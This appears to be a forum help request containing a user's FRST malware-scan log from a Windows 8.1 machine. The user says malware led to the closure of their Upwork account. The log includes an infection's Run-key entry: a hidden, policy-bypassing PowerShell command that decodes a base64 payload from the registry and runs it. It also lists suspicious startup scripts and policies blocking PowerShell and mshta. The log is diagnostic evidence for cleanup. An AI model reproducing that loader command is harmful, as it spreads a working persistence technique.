My computer is infected by malware and viruses that have led to the closure of my Upwork's online account be the administrator. Upwork is an online freelancing platform where clients hire writers for their projects.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-05-2017 01
Ran by DENNIS M (administrator) on NON (05-05-2017 12:44:08)
Running from C:\Users\USER\Desktop
Loaded Profiles: DENNIS M (Available Profiles: DENNIS M)
Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\stacsv64.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Smadsoft) C:\Program Files (x86)\SMADAV\SMΔRTP.exe
(IDT, Inc.) C:\Program Files\SigmaTel\C-Major Audio\WDM\sttray64.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\WebcamMax\wcmmon.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\Upwork\upwork.exe
(Creative Technology Ltd.) C:\Windows\OEM02Mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect32.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect64.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-05] (AVAST Software)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SMΔRT-Protection] => C:\Program Files (x86)\Smadav\SMΔRTP.exe [1736704 2017-01-14] (Smadsoft)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Upwork] => C:\Program Files (x86)\Upwork\upwork.exe [2227496 2017-03-22] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [WebcamMaxAutoRun] => C:\Program Files (x86)\WebcamMax\wcmmon.exe [1038848 2011-07-17] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27545048 2017-03-14] (Skype Technologies S.A.)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [{245CAE4C-B7DC-4752-B92F-63DC8D25D4FD}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\wKNjXxBOSrsVKip').XFXEEJHACAA)));
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: F - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {3095b6bd-de5e-11e6-826c-001e101ff262} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767a9-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767d2-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a876c3c-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a87767e-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {87768129-1e8e-11e7-82b0-001e101f9824} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488244-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488259-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488288-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {b12ce2cb-f2e7-11e6-828b-ac9469c63d41} - "F:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de97fe40-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de980e8d-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c454ea-e7bf-11e6-8278-001e101f5f92} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c45c74-e7bf-11e6-8278-001e101f5f92} - "I:\Windows/AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f883703f-b67f-11e6-824f-d86e29ba0045} - "F:\LGAutoRun.exe"
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
Startup: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs [2017-04-05] ()
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
ProxyServer: [S-1-5-21-1975919165-801266099-53085287-1001] => 172.16.63.3:3128
Tcpip\..\Interfaces\{184075C4-2C8A-47A2-9E62-9B050AC455FE}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{81B6590E-6D8F-436F-A5D6-5C5E2B0D4DAA}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{9BC7269C-8318-4392-AE33-BA4A97141ADE}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{EB8D0396-AB58-4921-9F28-5549F56295E6}: [NameServer] 196.201.217.7 196.201.216.21
Internet Explorer:
==================
HKU\S-1-5-21-1975919165-801266099-53085287-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-05-05] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-05-05] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 70sdybgu.default
FF ProfilePath: C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default [2017-05-05]
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> share_proxy_settings", true
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> type", 0
FF Extension: (Grammarly for Firefox) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-05-04]
FF Extension: (Simple YouTube to MP3/MP4 Converter and Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-23]
FF Extension: (Youtube Downloader - 4K Download) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (1-Click YouTube Video Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (Youtube Best Video Downloader 2) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{170503FA-3349-4F17-BC86-001888A5C8E2}.xpi [2017-04-10]
FF Extension: (Copy As Plain Text) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{1a5dabbd-0e74-41da-b532-a364bb552cab}.xpi [2017-01-30]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2017-02-18]
FF Extension: (Shield Recipe Client) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\features\{70a68181-2263-4af4-847f-b2a1a5404527}\[email protected] [2017-05-01]
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll [2016-11-27] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
Chrome:
=======
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default [2017-05-04]
CHR Extension: (Google Docs) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-01-11]
CHR Extension: (Google Drive) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-11]
CHR Extension: (YouTube) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-11]
CHR Extension: (Google Docs Offline) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-01-11]
CHR Extension: (Grammarly for Chrome) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-04-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-14]
CHR Extension: (Gmail) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-11]
CHR Extension: (Chrome Media Router) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-10]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe [86016 2007-09-20] (Andrea Electronics Corporation)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-05] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-05] (AVAST Software)
R2 FoxitReaderService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe [1659592 2016-10-13] (Foxit Software Inc.)
S3 ShareItSvc; C:\Program Files (x86)\SHAREit\SHAREit\Shareit.Service.exe [33224 2016-04-15] (SHAREit Technologies Co.Ltd)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\STacSV64.exe [122880 2008-02-15] (IDT, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-05] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-05] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-05] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-05] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-05] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-05] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-05] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-05] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-05] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-05] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-05] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158368 2017-05-05] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-05] (AVAST Software)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63al.sys [5170176 2013-07-01] (Broadcom Corporation)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 ewusbnet; C:\Windows\system32\DRIVERS\ewusbnet.sys [246224 2009-12-07] (Huawei Technologies Co., Ltd.)
R3 hwusbdev; C:\Windows\system32\DRIVERS\ewusbdev.sys [114304 2009-10-12] (Huawei Technologies Co., Ltd.)
R3 OEM02Dev; C:\Windows\system32\DRIVERS\OEM02Dev.sys [266624 2007-10-10] (Creative Technology Ltd.)
R3 OEM02Vfx; C:\Windows\system32\DRIVERS\OEM02Vfx.sys [12288 2007-03-05] (EyePower Games Pte. Ltd.)
R2 risdptsk; C:\Windows\system32\DRIVERS\risdsn64.sys [76288 2009-09-24] (REDC)
S3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (The OpenVPN Project) [File not signed]
S3 VMSMP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
S3 VMSP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
R2 WCMVCAM; C:\Windows\system32\DRIVERS\wcmvcam64.sys [1071032 2012-04-16] (Windows ® Win 7 DDK provider)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-05-05 12:37 - 2017-05-05 12:43 - 00023145 _____ C:\Users\USER\Desktop\Addition.txt
2017-05-05 12:36 - 2017-05-05 12:44 - 00019388 _____ C:\Users\USER\Desktop\FRST.txt
2017-05-05 12:35 - 2017-05-05 12:44 - 00000000 ____D C:\FRST
2017-05-05 12:32 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Desktop\FRST64.exe
2017-05-05 12:30 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Downloads\FRST64.exe
2017-05-05 11:35 - 2017-05-05 11:35 - 00003882 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1493973343
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-05-05 11:34 - 2017-05-05 11:34 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw722D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw7048.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6DD6.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6C10.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6817.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw65F3.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw641D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw612E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw5DC2.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw590E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw54C8.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw51C9.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4F18.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4C78.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4979.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw46F7.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw40FB.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3DBE.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3B3C.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw36A7.tmp
2017-05-05 10:06 - 2017-05-05 10:06 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-05 10:03 - 2017-05-05 10:03 - 00000000 ____D C:\Users\USER\AppData\Roaming\AVAST Software
2017-05-05 09:56 - 2017-05-05 11:12 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-05 09:55 - 2017-05-05 11:22 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-05-05 09:55 - 2017-05-05 09:54 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00158368 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-05-05 09:54 - 2017-05-05 09:54 - 00992960 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00921280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-05 09:42 - 2017-05-05 11:34 - 00000000 ____D C:\Program Files\AVAST Software
2017-05-05 09:40 - 2017-05-05 11:34 - 00000000 ____D C:\ProgramData\AVAST Software
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\USER\Downloads\avast_free_antivirus_setup_online.exe
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\Public\Desktop\avast_free_antivirus_setup_online.exe
2017-05-04 11:34 - 2017-05-04 11:34 - 00000000 ____D C:\Users\USER\Desktop\New folder
2017-05-02 19:32 - 2017-05-02 19:32 - 00013188 ____H C:\Users\USER\Documents\~WRL0251.tmp
2017-04-28 12:01 - 2017-04-28 12:01 - 00002432 _____ C:\Users\USER\Desktop\Grammarly.lnk
2017-04-28 12:01 - 2017-04-28 12:01 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly
2017-04-28 12:00 - 2017-04-28 12:02 - 00000000 ____D C:\Users\USER\AppData\Local\GrammarlyForWindows
2017-04-28 11:38 - 2017-04-28 11:52 - 48679480 _____ (Grammarly) C:\Users\USER\Downloads\GrammarlySetup.exe
2017-04-25 19:58 - 2017-04-25 19:58 - 00199010 __RSH C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-24 16:26 - 2017-04-24 16:26 - 00000000 ____D C:\Users\USER\Desktop\certs
2017-04-24 16:05 - 2017-05-03 15:55 - 00000000 __SHD C:\[Smad-Cage]
2017-04-24 16:05 - 2017-04-28 15:16 - 00000000 ____D C:\Program Files (x86)\SMADAV
2017-04-24 16:05 - 2017-04-24 16:05 - 00003162 _____ C:\Windows\System32\Tasks\smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00001080 _____ C:\Users\Public\Desktop\SMADΔV.lnk
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\Users\USER\AppData\Roaming\Smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus
2017-04-24 16:03 - 2017-04-24 16:03 - 01500777 _____ (Smadsoft ) C:\Users\USER\Downloads\smadav2017.exe
